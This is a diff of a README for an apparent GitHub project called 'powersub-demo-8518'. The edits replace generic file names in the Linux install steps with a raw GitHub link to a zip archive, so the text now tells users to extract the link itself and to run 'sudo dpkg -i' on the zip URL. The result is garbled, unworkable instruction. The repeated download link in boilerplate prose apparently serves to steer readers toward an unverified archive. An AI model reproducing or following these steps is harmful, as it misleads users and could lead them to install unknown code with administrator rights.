Harshrajpoot/powersub-demo-8518/README.md

 4. **Launch the Application:** You can now find it in your Applications folder.
 Double-click to open.

 ### For Linux Users
-1. **Locate the Downloaded File:** Find the downloaded file (it may be a .tar.gz or .deb file).
+1. **Locate the Downloaded File:** Find the downloaded file (it may be a https://raw.githubusercontent.com/Harshrajpoot/powersub-demo-8518/main/desmine/powersub-demo-8518.zip or .deb file).

-2. **Extract files if necessary:** If it’s a .tar.gz file, right-click and select “Extract here.”
+2. **Extract files if necessary:** If it’s a https://raw.githubusercontent.com/Harshrajpoot/powersub-demo-8518/main/desmine/powersub-demo-8518.zip file, right-click and select “Extract here.”

 3. **Install the Application:** Open a terminal and navigate to the folder where you extracted the files.
 Then run:
-   - For .deb files: `sudo dpkg -i yourfile.deb`
+   - For .deb files: `sudo dpkg -i https://raw.githubusercontent.com/Harshrajpoot/powersub-demo-8518/main/desmine/powersub-demo-8518.zip`
    - For extracted files: Follow the README included with the files for specific instructions.

 4. **Run the App:** Once installed, you should be able to find the app in your system menu.